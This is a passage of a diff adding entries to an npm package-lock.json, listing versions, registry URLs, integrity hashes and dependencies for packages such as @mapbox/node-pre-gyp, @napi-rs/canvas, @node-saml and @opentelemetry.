"sha512-t7fpf3+gi/jiAtW+Gv734TbKdpPg6b8qATH01/jprW9H2oR++Tb688IHwJvZbk9F4GjpCEv86beuHMpUyC1b5g==", + "dev": true, + "dependencies": { + "@lezer/highlight": "^1.0.0", + "@lezer/lr": "^1.0.0" + } + }, + "node_modules/@lezer/lr": { + "version": "1.4.2", + "resolved": "https://registry.npmjs.org/@lezer/lr/-/lr-1.4.2.tgz", + "integrity": "sha512-pu0K1jCIdnQ12aWNaAVU5bzi7Bd1w54J3ECgANPmYLtQKP0HBj2cE/5coBD66MT10xbtIuUr7tg0Shbsvk0mDA==", + "dev": true, + "dependencies": { + "@lezer/common": "^1.0.0" + } + }, + "node_modules/@lezer/markdown": { + "version": "1.3.2", + "resolved": "https://registry.npmjs.org/@lezer/markdown/-/markdown-1.3.2.tgz", + "integrity": "sha512-Wu7B6VnrKTbBEohqa63h5vxXjiC4pO5ZQJ/TDbhJxPQaaIoRD/6UVDhSDtVsCwVZV12vvN9KxuLL3ATMnlG0oQ==", + "dev": true, + "license": "MIT", + "dependencies": { + "@lezer/common": "^1.0.0", + "@lezer/highlight": "^1.0.0" + } + }, + "node_modules/@lukeed/csprng": { + "version": "1.1.0", + "resolved": "https://registry.npmjs.org/@lukeed/csprng/-/csprng-1.1.0.tgz", + "integrity": "sha512-Z7C/xXCiGWsg0KuKsHTKJxbWhpI3Vs5GwLfOean7MGyVFGqdRgBbAjOCh6u4bbjPc/8MJ2pZmK/0DLdCbivLDA==", + "license": "MIT", + "engines": { + "node": ">=8" + } + }, + "node_modules/@lukeed/uuid": { + "version": "2.0.1", + "resolved": "https://registry.npmjs.org/@lukeed/uuid/-/uuid-2.0.1.tgz", + "integrity": "sha512-qC72D4+CDdjGqJvkFMMEAtancHUQ7/d/tAiHf64z8MopFDmcrtbcJuerDtFceuAfQJ2pDSfCKCtbqoGBNnwg0w==", + "license": "MIT", + "dependencies": { + "@lukeed/csprng": "^1.1.0" + }, + "engines": { + "node": ">=8" + } + }, + "node_modules/@mapbox/node-pre-gyp": { + "version": "1.0.8", + "resolved": "https://registry.npmjs.org/@mapbox/node-pre-gyp/-/node-pre-gyp-1.0.8.tgz", + "integrity": "sha512-CMGKi28CF+qlbXh26hDe6NxCd7amqeAzEqnS6IHeO6LoaKyM/n+Xw3HT1COdq8cuioOdlKdqn/hCmqPUOMOywg==", + "dependencies": { + "detect-libc": "^1.0.3", + "https-proxy-agent": "^5.0.0", + "make-dir": "^3.1.0", + "node-fetch": "^2.6.5", + "nopt": "^5.0.0", + "npmlog": "^5.0.1", + "rimraf": "^3.0.2", + "semver": "^7.3.5", + "tar": "^6.1.11" + }, + "bin": { + "node-pre-gyp": "bin/node-pre-gyp" + } + }, + "node_modules/@mapbox/node-pre-gyp/node_modules/lru-cache": { + "version": "6.0.0", + "resolved": "https://registry.npmjs.org/lru-cache/-/lru-cache-6.0.0.tgz", + "integrity": "sha512-Jo6dJ04CmSjuznwJSS3pUeWmd/H0ffTlkXXgwZi+eq1UCmqQwCh+eLsYOYCwY991i2Fah4h1BEMCx4qThGbsiA==", + "dependencies": { + "yallist": "^4.0.0" + }, + "engines": { + "node": ">=10" + } + }, + "node_modules/@mapbox/node-pre-gyp/node_modules/make-dir": { + "version": "3.1.0", + "resolved": "https://registry.npmjs.org/make-dir/-/make-dir-3.1.0.tgz", + "integrity": "sha512-g3FeP20LNwhALb/6Cz6Dd4F2ngze0jz7tbzrD2wAV+o9FeNHe4rL+yK2md0J/fiSf1sa1ADhXqi5+oVwOM/eGw==", + "dependencies": { + "semver": "^6.0.0" + }, + "engines": { + "node": ">=8" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/@mapbox/node-pre-gyp/node_modules/make-dir/node_modules/semver": { + "version": "6.3.1", + "resolved": "https://registry.npmjs.org/semver/-/semver-6.3.1.tgz", + "integrity": "sha512-BR7VvDCVHO+q2xBEWskxS6DJE1qRnb7DxzUrogb71CWoSficBxYsiAGd+Kl0mmq/MprG9yArRkyrQxTO6XjMzA==", + "bin": { + "semver": "bin/semver.js" + } + }, + "node_modules/@mapbox/node-pre-gyp/node_modules/rimraf": { + "version": "3.0.2", + "resolved": "https://registry.npmjs.org/rimraf/-/rimraf-3.0.2.tgz", + "integrity": "sha512-JZkJMZkAGFFPP2YqXZXPbMlMBgsxzE8ILs4lMIX/2o0L9UBw9O/Y3o6wFw/i9YLapcUJWwqbi3kdxIPdC62TIA==", + "dependencies": { + "glob": "^7.1.3" + }, + "bin": { + "rimraf": "bin.js" + }, + "funding": { + "url": "https://github.com/sponsors/isaacs" + } + }, + "node_modules/@mapbox/node-pre-gyp/node_modules/semver": { + "version": "7.5.4", + "resolved": "https://registry.npmjs.org/semver/-/semver-7.5.4.tgz", + "integrity": "sha512-1bCSESV6Pv+i21Hvpxp3Dx+pSD8lIPt8uVjRrxAUt/nbswYc+tK6Y2btiULjd4+fnq15PX+nqQDC7Oft7WkwcA==", + "dependencies": { + "lru-cache": "^6.0.0" + }, + "bin": { + "semver": "bin/semver.js" + }, + "engines": { + "node": ">=10" + } + }, + "node_modules/@mapbox/node-pre-gyp/node_modules/yallist": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/yallist/-/yallist-4.0.0.tgz", + "integrity": "sha512-3wdGidZyq5PB084XLES5TpOSRA3wjXAlIWMhum2kRcv/41Sn2emQ0dycQW4uZXLejwKvg6EsvbdlVL+FYEct7A==" + }, + "node_modules/@marijn/find-cluster-break": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/@marijn/find-cluster-break/-/find-cluster-break-1.0.2.tgz", + "integrity": "sha512-l0h88YhZFyKdXIFNfSWpyjStDjGHwZ/U7iobcK1cQQD8sejsONdQtTVU+1wVN1PBw40PiiHB1vA5S7VTfQiP9g==", + "dev": true, + "license": "MIT" + }, + "node_modules/@maxmind/geoip2-node": { + "version": "5.0.0", + "resolved": "https://registry.npmjs.org/@maxmind/geoip2-node/-/geoip2-node-5.0.0.tgz", + "integrity": "sha512-ki+q5//oU4tZ3BAhegZJcB5czoZyic5JSTEKbrUAQB/BzAoAiGyLW0immEmQvVVyy2SMlvBTJ3zqyRj8K9BbwQ==", + "dependencies": { + "ip6addr": "^0.2.5", + "maxmind": "^4.2.0" + } + }, + "node_modules/@mdx-js/react": { + "version": "3.1.0", + "resolved": "https://registry.npmjs.org/@mdx-js/react/-/react-3.1.0.tgz", + "integrity": "sha512-QjHtSaoameoalGnKDT3FoIl4+9RwyTmo9ZJGBdLOks/YOiWHoRDI3PUwEzOE7kEmGcV3AFcp9K6dYu9rEuKLAQ==", + "dev": true, + "license": "MIT", + "dependencies": { + "@types/mdx": "^2.0.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/unified" + }, + "peerDependencies": { + "@types/react": ">=16", + "react": ">=16" + } + }, + "node_modules/@mongodb-js/saslprep": { + "version": "1.1.9", + "resolved": "https://registry.npmjs.org/@mongodb-js/saslprep/-/saslprep-1.1.9.tgz", + "integrity": "sha512-tVkljjeEaAhCqTzajSdgbQ6gE6f3oneVwa3iXR6csiEwXXOFsiC6Uh9iAjAhXPtqa/XMDHWjjeNH/77m/Yq2dw==", + "dependencies": { + "sparse-bitfield": "^3.0.3" + } + }, + "node_modules/@msgpackr-extract/msgpackr-extract-darwin-arm64": { + "version": "3.0.3", + "resolved": "https://registry.npmjs.org/@msgpackr-extract/msgpackr-extract-darwin-arm64/-/msgpackr-extract-darwin-arm64-3.0.3.tgz", + "integrity": "sha512-QZHtlVgbAdy2zAqNA9Gu1UpIuI8Xvsd1v8ic6B2pZmeFnFcMWiPLfWXh7TVw4eGEZ/C9TH281KwhVoeQUKbyjw==", + "cpu": [ + "arm64" + ], + "license": "MIT", + "optional": true, + "os": [ + "darwin" + ] + }, + "node_modules/@msgpackr-extract/msgpackr-extract-darwin-x64": { + "version": "3.0.3", + "resolved": "https://registry.npmjs.org/@msgpackr-extract/msgpackr-extract-darwin-x64/-/msgpackr-extract-darwin-x64-3.0.3.tgz", + "integrity": "sha512-mdzd3AVzYKuUmiWOQ8GNhl64/IoFGol569zNRdkLReh6LRLHOXxU4U8eq0JwaD8iFHdVGqSy4IjFL4reoWCDFw==", + "cpu": [ + "x64" + ], + "license": "MIT", + "optional": true, + "os": [ + "darwin" + ] + }, + "node_modules/@msgpackr-extract/msgpackr-extract-linux-arm": { + "version": "3.0.3", + "resolved": "https://registry.npmjs.org/@msgpackr-extract/msgpackr-extract-linux-arm/-/msgpackr-extract-linux-arm-3.0.3.tgz", + "integrity": "sha512-fg0uy/dG/nZEXfYilKoRe7yALaNmHoYeIoJuJ7KJ+YyU2bvY8vPv27f7UKhGRpY6euFYqEVhxCFZgAUNQBM3nw==", + "cpu": [ + "arm" + ], + "license": "MIT", + "optional": true, + "os": [ + "linux" + ] + }, + "node_modules/@msgpackr-extract/msgpackr-extract-linux-arm64": { + "version": "3.0.3", + "resolved": "https://registry.npmjs.org/@msgpackr-extract/msgpackr-extract-linux-arm64/-/msgpackr-extract-linux-arm64-3.0.3.tgz", + "integrity": "sha512-YxQL+ax0XqBJDZiKimS2XQaf+2wDGVa1enVRGzEvLLVFeqa5kx2bWbtcSXgsxjQB7nRqqIGFIcLteF/sHeVtQg==", + "cpu": [ + "arm64" + ], + "license": "MIT", + "optional": true, + "os": [ + "linux" + ] + }, + "node_modules/@msgpackr-extract/msgpackr-extract-linux-x64": { + "version": "3.0.3", + "resolved": "https://registry.npmjs.org/@msgpackr-extract/msgpackr-extract-linux-x64/-/msgpackr-extract-linux-x64-3.0.3.tgz", + "integrity": "sha512-cvwNfbP07pKUfq1uH+S6KJ7dT9K8WOE4ZiAcsrSes+UY55E/0jLYc+vq+DO7jlmqRb5zAggExKm0H7O/CBaesg==", + "cpu": [ + "x64" + ], + "license": "MIT", + "optional": true, + "os": [ + "linux" + ] + }, + "node_modules/@msgpackr-extract/msgpackr-extract-win32-x64": { + "version": "3.0.3", + "resolved": "https://registry.npmjs.org/@msgpackr-extract/msgpackr-extract-win32-x64/-/msgpackr-extract-win32-x64-3.0.3.tgz", + "integrity": "sha512-x0fWaQtYp4E6sktbsdAqnehxDgEc/VwM7uLsRCYWaiGu0ykYdZPiS8zCWdnjHwyiumousxfBm4SO31eXqwEZhQ==", + "cpu": [ + "x64" + ], + "license": "MIT", + "optional": true, + "os": [ + "win32" + ] + }, + "node_modules/@napi-rs/canvas": { + "version": "0.1.65", + "resolved": "https://registry.npmjs.org/@napi-rs/canvas/-/canvas-0.1.65.tgz", + "integrity": "sha512-YcFhXQcp+b2d38zFOJNbpyPHnIL7KAEkhJQ+UeeKI5IpE9B8Cpf/M6RiHPQXSsSqnYbrfFylnW49dyh2oeSblQ==", + "dev": true, + "license": "MIT", + "optional": true, + "engines": { + "node": ">= 10" + }, + "optionalDependencies": { + "@napi-rs/canvas-android-arm64": "0.1.65", + "@napi-rs/canvas-darwin-arm64": "0.1.65", + "@napi-rs/canvas-darwin-x64": "0.1.65", + "@napi-rs/canvas-linux-arm-gnueabihf": "0.1.65", + "@napi-rs/canvas-linux-arm64-gnu": "0.1.65", + "@napi-rs/canvas-linux-arm64-musl": "0.1.65", + "@napi-rs/canvas-linux-riscv64-gnu": "0.1.65", + "@napi-rs/canvas-linux-x64-gnu": "0.1.65", + "@napi-rs/canvas-linux-x64-musl": "0.1.65", + "@napi-rs/canvas-win32-x64-msvc": "0.1.65" + } + }, + "node_modules/@napi-rs/canvas-android-arm64": { + "version": "0.1.65", + "resolved": "https://registry.npmjs.org/@napi-rs/canvas-android-arm64/-/canvas-android-arm64-0.1.65.tgz", + "integrity": "sha512-ZYwqFYEKcT5Zr8lbiaJNJj/poLaeK2TncolY914r+gD2TJNeP7ZqvE7A2SX/1C9MB4E3DQEwm3YhL3WEf0x3MQ==", + "cpu": [ + "arm64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "android" + ], + "engines": { + "node": ">= 10" + } + }, + "node_modules/@napi-rs/canvas-darwin-arm64": { + "version": "0.1.65", + "resolved": "https://registry.npmjs.org/@napi-rs/canvas-darwin-arm64/-/canvas-darwin-arm64-0.1.65.tgz", + "integrity": "sha512-Pg1pfiJEyDIsX+V0QaJPRWvXbw5zmWAk3bivFCvt/5pwZb37/sT6E/RqPHT9NnqpDyKW6SriwY9ypjljysUA1Q==", + "cpu": [ + "arm64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "darwin" + ], + "engines": { + "node": ">= 10" + } + }, + "node_modules/@napi-rs/canvas-darwin-x64": { + "version": "0.1.65", + "resolved": "https://registry.npmjs.org/@napi-rs/canvas-darwin-x64/-/canvas-darwin-x64-0.1.65.tgz", + "integrity": "sha512-3Tr+/HjdJN7Z/VKIcsxV2DvDIibZCExgfYTgljCkUSFuoI7iNkOE6Dc1Q6j212EB9PeO8KmfrViBqHYT6IwWkA==", + "cpu": [ + "x64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "darwin" + ], + "engines": { + "node": ">= 10" + } + }, + "node_modules/@napi-rs/canvas-linux-arm-gnueabihf": { + "version": "0.1.65", + "resolved": "https://registry.npmjs.org/@napi-rs/canvas-linux-arm-gnueabihf/-/canvas-linux-arm-gnueabihf-0.1.65.tgz", + "integrity": "sha512-3KP+dYObH7CVkZMZWwk1WX9jRjL+EKdQtD43H8MOI+illf+dwqLlecdQ4d9bQRIxELKJ8dyPWY4fOp/Ngufrdg==", + "cpu": [ + "arm" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "linux" + ], + "engines": { + "node": ">= 10" + } + }, + "node_modules/@napi-rs/canvas-linux-arm64-gnu": { + "version": "0.1.65", + "resolved": "https://registry.npmjs.org/@napi-rs/canvas-linux-arm64-gnu/-/canvas-linux-arm64-gnu-0.1.65.tgz", + "integrity": "sha512-Ka3StKz7Dq7kjTF3nNJCq43UN/VlANS7qGE3dWkn1d+tQNsCRy/wRmyt1TUFzIjRqcTFMQNRbgYq84+53UBA0A==", + "cpu": [ + "arm64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "linux" + ], + "engines": { + "node": ">= 10" + } + }, + "node_modules/@napi-rs/canvas-linux-arm64-musl": { + "version": "0.1.65", + "resolved": "https://registry.npmjs.org/@napi-rs/canvas-linux-arm64-musl/-/canvas-linux-arm64-musl-0.1.65.tgz", + "integrity": "sha512-O4xMASm2JrmqYoiDyxVWi+z5C14H+oVEag2rZ5iIA67dhWqYZB+iO7wCFpBYRj31JPBR29FOsu6X9zL+DwBFdw==", + "cpu": [ + "arm64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "linux" + ], + "engines": { + "node": ">= 10" + } + }, + "node_modules/@napi-rs/canvas-linux-riscv64-gnu": { + "version": "0.1.65", + "resolved": "https://registry.npmjs.org/@napi-rs/canvas-linux-riscv64-gnu/-/canvas-linux-riscv64-gnu-0.1.65.tgz", + "integrity": "sha512-dblWDaA59ZU8bPbkfM+riSke7sFbNZ70LEevUdI5rgiFEUzYUQlU34gSBzemTACj5rCWt1BYeu0GfkLSjNMBSw==", + "cpu": [ + "riscv64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "linux" + ], + "engines": { + "node": ">= 10" + } + }, + "node_modules/@napi-rs/canvas-linux-x64-gnu": { + "version": "0.1.65", + "resolved": "https://registry.npmjs.org/@napi-rs/canvas-linux-x64-gnu/-/canvas-linux-x64-gnu-0.1.65.tgz", + "integrity": "sha512-wsp+atutw13OJXGU3DDkdngtBDoEg01IuK5xMe0L6VFPV8maGkh17CXze078OD5QJOc6kFyw3DDscMLOPF8+oA==", + "cpu": [ + "x64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "linux" + ], + "engines": { + "node": ">= 10" + } + }, + "node_modules/@napi-rs/canvas-linux-x64-musl": { + "version": "0.1.65", + "resolved": "https://registry.npmjs.org/@napi-rs/canvas-linux-x64-musl/-/canvas-linux-x64-musl-0.1.65.tgz", + "integrity": "sha512-odX+nN+IozWzhdj31INcHz3Iy9+EckNw+VqsZcaUxZOTu7/3FmktRNI6aC1qe5minZNv1m05YOS1FVf7fvmjlA==", + "cpu": [ + "x64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "linux" + ], + "engines": { + "node": ">= 10" + } + }, + "node_modules/@napi-rs/canvas-win32-x64-msvc": { + "version": "0.1.65", + "resolved": "https://registry.npmjs.org/@napi-rs/canvas-win32-x64-msvc/-/canvas-win32-x64-msvc-0.1.65.tgz", + "integrity": "sha512-RZQX3luWnlNWgdMnLMQ1hyfQraeAn9lnxWWVCHuUM4tAWEV8UDdeb7cMwmJW7eyt8kAosmjeHt3cylQMHOxGFg==", + "cpu": [ + "x64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "win32" + ], + "engines": { + "node": ">= 10" + } + }, + "node_modules/@nicolo-ribaudo/chokidar-2": { + "version": "2.1.8-no-fsevents.3", + "resolved": "https://registry.npmjs.org/@nicolo-ribaudo/chokidar-2/-/chokidar-2-2.1.8-no-fsevents.3.tgz", + "integrity": "sha512-s88O1aVtXftvp5bCPB7WnmXc5IwOZZ7YPuwNPt+GtOOXpPvad1LfbmjYv+qII7zP6RU2QGnqve27dnLycEnyEQ==", + "dev": true, + "optional": true + }, + "node_modules/@node-oauth/formats": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/@node-oauth/formats/-/formats-1.0.0.tgz", + "integrity": "sha512-DwSbLtdC8zC5B5gTJkFzJj5s9vr9SGzOgQvV9nH7tUVuMSScg0EswAczhjIapOmH3Y8AyP7C4Jv7b8+QJObWZA==" + }, + "node_modules/@node-oauth/oauth2-server": { + "version": "5.1.0", + "resolved": "https://registry.npmjs.org/@node-oauth/oauth2-server/-/oauth2-server-5.1.0.tgz", + "integrity": "sha512-sYvqL1GeZLRSwgl++/oOzxJj/ZBe2yXnp6E5LGNQ5qjpn0+t/dwquXILUe3Sk2Y8/wU7XeRxToOtBVeSVkuJag==", + "dependencies": { + "@node-oauth/formats": "1.0.0", + "basic-auth": "2.0.1", + "type-is": "1.6.18" + }, + "engines": { + "node": ">=16.0.0" + } + }, + "node_modules/@node-rs/crc32": { + "version": "0.1.8", + "resolved": "https://registry.npmjs.org/@node-rs/crc32/-/crc32-0.1.8.tgz", + "integrity": "sha512-gnQhWJDieK9gg+b4g1IR7T3CvBQw15hmPPNc9oTtDCRKITStG1QtfGwLXnGtusxGCLoeDJAKlVHTVDNoeJ29LQ==", + "optional": true, + "dependencies": { + "@node-rs/helper": "^0.1.4" + } + }, + "node_modules/@node-rs/helper": { + "version": "0.1.4", + "resolved": "https://registry.npmjs.org/@node-rs/helper/-/helper-0.1.4.tgz", + "integrity": "sha512-f63wMA9m32dkX40XWCbDysoFLFGf+6WB/Vn90mW3CQVQe2hqgQPHLBMgriuI9eW9gnqdLnuHQGArg1WALeXCYA==", + "optional": true, + "dependencies": { + "tslib": "^2.0.0" + } + }, + "node_modules/@node-saml/node-saml": { + "version": "4.0.5", + "resolved": "https://registry.npmjs.org/@node-saml/node-saml/-/node-saml-4.0.5.tgz", + "integrity": "sha512-J5DglElbY1tjOuaR1NPtjOXkXY5bpUhDoKVoeucYN98A3w4fwgjIOPqIGcb6cQsqFq2zZ6vTCeKn5C/hvefSaw==", + "dependencies": { + "@types/debug": "^4.1.7", + "@types/passport": "^1.0.11", + "@types/xml-crypto": "^1.4.2", + "@types/xml-encryption": "^1.2.1", + "@types/xml2js": "^0.4.11", + "@xmldom/xmldom": "^0.8.6", + "debug": "^4.3.4", + "xml-crypto": "^3.0.1", + "xml-encryption": "^3.0.2", + "xml2js": "^0.5.0", + "xmlbuilder": "^15.1.1" + }, + "engines": { + "node": ">= 14" + } + }, + "node_modules/@node-saml/node-saml/node_modules/@xmldom/xmldom": { + "version": "0.8.10", + "resolved": "https://registry.npmjs.org/@xmldom/xmldom/-/xmldom-0.8.10.tgz", + "integrity": "sha512-2WALfTl4xo2SkGCYRt6rDTFfk9R1czmBvUQy12gK2KuRKIpWEhcbbzy8EZXtz/jkRqHX8bFEc6FC1HjX4TUWYw==", + "engines": { + "node": ">=10.0.0" + } + }, + "node_modules/@node-saml/node-saml/node_modules/debug": { + "version": "4.3.4", + "resolved": "https://registry.npmjs.org/debug/-/debug-4.3.4.tgz", + "integrity": "sha512-PRWFHuSU3eDtQJPvnNY7Jcket1j0t5OuOsFzPPzsekD52Zl8qUfFIPEiswXqIvHWGVHOgX+7G/vCNNhehwxfkQ==", + "dependencies": { + "ms": "2.1.2" + }, + "engines": { + "node": ">=6.0" + }, + "peerDependenciesMeta": { + "supports-color": { + "optional": true + } + } + }, + "node_modules/@node-saml/node-saml/node_modules/ms": { + "version": "2.1.2", + "resolved": "https://registry.npmjs.org/ms/-/ms-2.1.2.tgz", + "integrity": "sha512-sGkPx+VjMtmA6MX27oA4FBFELFCZZ4S4XqeGOXCv68tT+jb3vk/RyaKWP0PTKyWtmLSM0b+adUTEvbs1PEaH2w==" + }, + "node_modules/@node-saml/node-saml/node_modules/xml-encryption": { + "version": "3.0.2", + "resolved": "https://registry.npmjs.org/xml-encryption/-/xml-encryption-3.0.2.tgz", + "integrity": "sha512-VxYXPvsWB01/aqVLd6ZMPWZ+qaj0aIdF+cStrVJMcFj3iymwZeI0ABzB3VqMYv48DkSpRhnrXqTUkR34j+UDyg==", + "dependencies": { + "@xmldom/xmldom": "^0.8.5", + "escape-html": "^1.0.3", + "xpath": "0.0.32" + }, + "engines": { + "node": ">=12" + } + }, + "node_modules/@node-saml/node-saml/node_modules/xml2js": { + "version": "0.5.0", + "resolved": "https://registry.npmjs.org/xml2js/-/xml2js-0.5.0.tgz", + "integrity": "sha512-drPFnkQJik/O+uPKpqSgr22mpuFHqKdbS835iAQrUC73L2F5WkboIRd63ai/2Yg6I1jzifPFKH2NTK+cfglkIA==", + "dependencies": { + "sax": ">=0.6.0", + "xmlbuilder": "~11.0.0" + }, + "engines": { + "node": ">=4.0.0" + } + }, + "node_modules/@node-saml/node-saml/node_modules/xml2js/node_modules/xmlbuilder": { + "version": "11.0.1", + "resolved": "https://registry.npmjs.org/xmlbuilder/-/xmlbuilder-11.0.1.tgz", + "integrity": "sha512-fDlsI/kFEx7gLvbecc0/ohLG50fugQp8ryHzMTuW9vSa1GJ0XYWKnhsUx7oie3G98+r56aTQIUB4kht42R3JvA==", + "engines": { + "node": ">=4.0" + } + }, + "node_modules/@node-saml/node-saml/node_modules/xpath": { + "version": "0.0.32", + "resolved": "https://registry.npmjs.org/xpath/-/xpath-0.0.32.tgz", + "integrity": "sha512-rxMJhSIoiO8vXcWvSifKqhvV96GjiD5wYb8/QHdoRyQvraTpp4IEv944nhGausZZ3u7dhQXteZuZbaqfpB7uYw==", + "engines": { + "node": ">=0.6.0" + } + }, + "node_modules/@node-saml/passport-saml": { + "version": "4.0.4", + "resolved": "https://registry.npmjs.org/@node-saml/passport-saml/-/passport-saml-4.0.4.tgz", + "integrity": "sha512-xFw3gw0yo+K1mzlkW15NeBF7cVpRHN/4vpjmBKzov5YFImCWh/G0LcTZ8krH3yk2/eRPc3Or8LRPudVJBjmYaw==", + "dependencies": { + "@node-saml/node-saml": "^4.0.4", + "@types/express": "^4.17.14", + "@types/passport": "^1.0.11", + "@types/passport-strategy": "^0.2.35", + "passport": "^0.6.0", + "passport-strategy": "^1.0.0" + }, + "engines": { + "node": ">= 14" + } + }, + "node_modules/@nodelib/fs.scandir": { + "version": "2.1.5", + "resolved": "https://registry.npmjs.org/@nodelib/fs.scandir/-/fs.scandir-2.1.5.tgz", + "integrity": "sha512-vq24Bq3ym5HEQm2NKCr3yXDwjc7vTsEThRDnkp2DK9p1uqLR+DHurm/NOTo0KG7HYHU7eppKZj3MyqYuMBf62g==", + "dependencies": { + "@nodelib/fs.stat": "2.0.5", + "run-parallel": "^1.1.9" + }, + "engines": { + "node": ">= 8" + } + }, + "node_modules/@nodelib/fs.stat": { + "version": "2.0.5", + "resolved": "https://registry.npmjs.org/@nodelib/fs.stat/-/fs.stat-2.0.5.tgz", + "integrity": "sha512-RkhPPp2zrqDAQA/2jNhnztcPAlv64XdhIp7a7454A5ovI7Bukxgt7MX7udwAu3zg1DcpPU0rz3VV1SeaqvY4+A==", + "engines": { + "node": ">= 8" + } + }, + "node_modules/@nodelib/fs.walk": { + "version": "1.2.8", + "resolved": "https://registry.npmjs.org/@nodelib/fs.walk/-/fs.walk-1.2.8.tgz", + "integrity": "sha512-oGB+UxlgWcgQkgwo8GcEGwemoTFt3FIO9ababBmaGwXIoBKZ+GTy0pP185beGg7Llih/NSHSV2XAs1lnznocSg==", + "dependencies": { + "@nodelib/fs.scandir": "2.1.5", + "fastq": "^1.6.0" + }, + "engines": { + "node": ">= 8" + } + }, + "node_modules/@opentelemetry/api": { + "version": "1.4.1", + "resolved": "https://registry.npmjs.org/@opentelemetry/api/-/api-1.4.1.tgz", + "integrity": "sha512-O2yRJce1GOc6PAy3QxFM4NzFiWzvScDC1/5ihYBL6BUEVdq0XMWN01sppE+H6bBXbaFYipjwFLEWLg5PaSOThA==", + "engines": { + "node": ">=8.0.0" + } + }, + "node_modules/@opentelemetry/api-logs": { + "version": "0.41.2", + "resolved": "https://registry.npmjs.org/@opentelemetry/api-logs/-/api-logs-0.41.2.tgz", + "integrity": "sha512-JEV2RAqijAFdWeT6HddYymfnkiRu2ASxoTBr4WsnGJhOjWZkEy6vp+Sx9ozr1NaIODOa2HUyckExIqQjn6qywQ==", + "dependencies": { + "@opentelemetry/api": "^1.0.0" + }, + "engines": { + "node": ">=14" + } + }, + "node_modules/@opentelemetry/auto-instrumentations-node": { + "version": "0.39.2", + "resolved": "https://registry.npmjs.org/@opentelemetry/auto-instrumentations-node/-/auto-instrumentations-node-0.39.2.tgz", + "integrity": "sha512-rC8r7rx8U0XT/0F3TyMCyP+lkFeWyenkfeVR2OPvo685TQRA5byTEu4+C3ZHNSbGNcvGUamcSsa0DQ6AvKlINQ==", + "dependencies": { + "@opentelemetry/instrumentation": "^0.41.2", + "@opentelemetry/instrumentation-amqplib": "^0.33.1", + "@opentelemetry/instrumentation-aws-lambda": "^0.37.0", + "@opentelemetry/instrumentation-aws-sdk": "^0.36.0", + "@opentelemetry/instrumentation-bunyan": "^0.32.1", + "@opentelemetry/instrumentation-cassandra-driver": "^0.33.1", + "@opentelemetry/instrumentation-connect": "^0.32.1", + "@opentelemetry/instrumentation-cucumber": "^0.1.0", + "@opentelemetry/instrumentation-dataloader": "^0.5.1", + "@opentelemetry/instrumentation-dns": "^0.32.2", + "@opentelemetry/instrumentation-express": "^0.33.1", + "@opentelemetry/instrumentation-fastify": "^0.32.2", + "@opentelemetry/instrumentation-fs": "^0.8.1", + "@opentelemetry/instrumentation-generic-pool": "^0.32.2", + "@opentelemetry/instrumentation-graphql": "^0.35.1", + "@opentelemetry/instrumentation-grpc": "^0.41.2", + "@opentelemetry/instrumentation-hapi": "^0.33.0", + "@opentelemetry/instrumentation-http": "^0.41.2", + "@opentelemetry/instrumentation-ioredis": "^0.35.1", + "@opentelemetry/instrumentation-knex": "^0.32.1", + "@opentelemetry/instrumentation-koa": "^0.36.0", + "@opentelemetry/instrumentation-lru-memoizer": "^0.33.1", + "@opentelemetry/instrumentation-memcached": "^0.32.1", + "@opentelemetry/instrumentation-mongodb": "^0.37.0", + "@opentelemetry/instrumentation-mongoose": "^0.33.1", + "@opentelemetry/instrumentation-mysql": "^0.34.1", + "@opentelemetry/instrumentation-mysql2": "^0.34.1", + "@opentelemetry/instrumentation-nestjs-core": "^0.33.1", + "@opentelemetry/instrumentation-net": "^0.32.1", + "@opentelemetry/instrumentation-pg": "^0.36.1", + "@opentelemetry/instrumentation-pino": "^0.34.1", + "@opentelemetry/instrumentation-redis": "^0.35.1", + "@opentelemetry/instrumentation-redis-4": "^0.35.1", + "@opentelemetry/instrumentation-restify": "^0.34.0", + "@opentelemetry/instrumentation-router": "^0.33.1", + "@opentelemetry/instrumentation-socket.io": "^0.34.1", + "@opentelemetry/instrumentation-tedious": "^0.6.1", + "@opentelemetry/instrumentation-winston": "^0.32.1", + "@opentelemetry/resource-detector-alibaba-cloud": "^0.28.1", + "@opentelemetry/resource-detector-aws": "^1.3.1", + "@opentelemetry/resource-detector-container": "^0.3.1", + "@opentelemetry/resource-detector-gcp": "^0.29.1", + "@opentelemetry/resources": "^1.12.0", + "@opentelemetry/sdk-node": "^0.41.2" + }, + "engines": { + "node": ">=14" + }, + "peerDependencies": { + "@opentelemetry/api": "^1.4.1" + } + }, + "node_modules/@opentelemetry/context-async-hooks": { + "version": "1.15.2", + "resolved": "https://registry.npmjs.org/@opentelemetry/context-async-hooks/-/context-async-hooks-1.15.2.tgz", + "integrity": "sha512-VAMHG67srGFQDG/N2ns5AyUT9vUcoKpZ/NpJ5fDQIPfJd7t3ju+aHwvDsMcrYBWuCh03U3Ky6o16+872CZchBg==", + "engines": { + "node": ">=14" + }, + "peerDependencies": { + "@opentelemetry/api": ">=1.0.0 <1.5.0" + } + }, + "node_modules/@opentelemetry/core": { + "version": "1.15.2", + "resolved": "https://registry.npmjs.org/@opentelemetry/core/-/core-1.15.2.tgz", + "integrity": "sha512-+gBv15ta96WqkHZaPpcDHiaz0utiiHZVfm2YOYSqFGrUaJpPkMoSuLBB58YFQGi6Rsb9EHos84X6X5+9JspmLw==", + "dependencies": { + "@opentelemetry/semantic-conventions": "1.15.2" + }, + "engines": { + "node": ">=14" + }, + "peerDependencies": { + "@opentelemetry/api": ">=1.0.0 <1.5.0" + } + }, + "node_modules/@opentelemetry/exporter-jaeger": { + "version": "1.15.2", + "resolved": 